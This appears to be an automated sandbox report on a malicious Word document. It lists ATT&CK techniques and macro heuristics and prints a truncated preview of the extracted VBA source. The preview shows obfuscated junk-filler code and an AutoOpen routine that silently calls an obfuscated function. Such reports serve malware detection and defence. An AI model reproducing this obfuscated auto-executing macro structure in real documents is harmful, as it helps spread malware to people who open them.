MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros, indicated by the OLE_VBA_MACROS and OLE_VBA_AUTOOPEN heuristics. The critical OLE_VBA_SHELL firing suggests the macro uses the Shell() function, a common method for executing arbitrary commands or downloading secondary payloads. The Autoopen marker further confirms the macro is designed to execute automatically upon opening the document.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 57347 bytes |
SHA-256: 91d4809cd9d829c285629940a6ac2870758e35c8da0f2b1c3b4a31fa643d4e75 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "GuwFPTcvSX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub RdaKs(EDtwB)
Select Case CrAjvD
Case 11003
wtGhqV = izZuj
VpQYv = Round(42378)
XsZZQ = Hex(XXYjT - ChrW(EJFXWs))
XEWDT = SFjBj
Case 15381
jELGU = CByte(63999)
QzqKT = Log(ziOQS)
End Select
End Sub
Sub fawzBo(VwUqV)
Select Case YTNAww
Case 6140
bEaNMk = DnqQj
cZiGJR = Round(29064)
TvHUV = Hex(mmiQRO - ChrW(EWYjp))
rRKiZ = wvuito
Case 63378
iHISsq = CByte(80130)
RIZzUm = Log(CKWUN)
End Select
Select Case tIQhi
Case 45473
sHlcka = wOFrz
PABFa = Round(34421)
XrUWT = Hex(Qkwsl - ChrW(SqiJX))
OtMboF = VzHtGL
Case 13230
MbBnO = CByte(16893)
KpzVU = Log(jXjqiI)
End Select
Select Case YwwCO
Case 82978
TIrrji = GOhWJn
iXdSkw = Round(77703)
bCcCvs = Hex(fwYXJ - ChrW(CzFpqm))
IzUUU = pbSjd
Case 84966
rhpOi = CByte(67329)
tjjzm = Log(zjaXdu)
End Select
End Sub
Sub OSciI(hClMOv)
Select Case zGVIrK
Case 13469
jZPWhq = IBvGi
wYFGGw = Round(3106)
HXUCHi = Hex(LRjSnb - ChrW(tMLaqT))
kRIMzD = PBkOFl
Case 47744
vTaMU = CByte(94259)
OnuEOf = Log(ufFiEW)
End Select
Select Case MqIbL
Case 91753
vEipJ = RrAiwz
CURup = Round(4447)
HEIXh = Hex(wjdRl - ChrW(BUSjM))
EobDf = jHVDrZ
Case 27038
JYIrvL = CByte(15930)
uiOit = Log(vjjlEf)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case OvDYhn
Case 49225
trEDzz = LboAGz
tozhtL = Round(78796)
FUiBv = Hex(ESNYib - ChrW(qJiuq))
VIzEY = UBPbAt
Case 26762
ZmkVzD = CByte(98727)
JacYW = Log(DfTnDs)
End Select
dCzIVMCGIzH (KIQKO + sTuhFQAJhGL + bprMiU)
Select Case bEZJwm
Case 38283
zWbAQ = wjHNqV
OdULj = Round(55297)
RRNwD = Hex(RwFKqQ - ChrW(FLloJ))
zcFjzn = MMaFwM
Case 19051
zhIczi = CByte(20621)
izWZwS = Log(sfBld)
End Select
End Sub
Sub LiOKEZ(YAMdG)
Select Case IdcLMT
Case 77949
bmdOCu = iZwbj
lzuSs = Round(8930)
bdksT = Hex(JZPTo - ChrW(oRjvk))
BfvqbP = abWii
Case 87968
OiCwB = CByte(70076)
hkjTGI = Log(rjBDJ)
End Select
Select Case rZKkC
Case 40559
stnujZ = DGPlu
BTuLX = Round(40226)
uirVa = Hex(XcpYR - ChrW(juCozo))
jnElUP = JUXiw
Case 26540
NvJBRU = CByte(15745)
sOiwq = Log(GwfzW)
End Select
Select Case oUpzXF
Case 32664
DEKZD = Twsnf
iiupC = Round(41775)
vDVsh = Hex(cssGMd - ChrW(DswnE))
ubuHG = RCGKZz
Case 90683
fVMhM = CByte(55981)
aVarjJ = Log(RlfHl)
End Select
End Sub
Sub azBvPA(ZWiSG)
Select Case bjijR
Case 51502
KUGUPa = wkViSN
bhTRS = Round(24120)
YEmHl = Hex(hmjEO - ChrW(KjGrjf))
RRoAEz = PAwOPz
Case 27389
mQUNi = CByte(20395)
MBQQm = Log(RUqml)
End Select
End Sub
Attribute VB_Name = "uwkDiHszhnU"
Sub PSzzqW(AiQEm)
Select Case oNpzfH
Case 53868
WTRBMm = mKTYh
AUFUiU = Round(35900)
wdrzTu = Hex(CCBfsM - ChrW(wfvdkO))
TzjFJ = skcBnJ
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.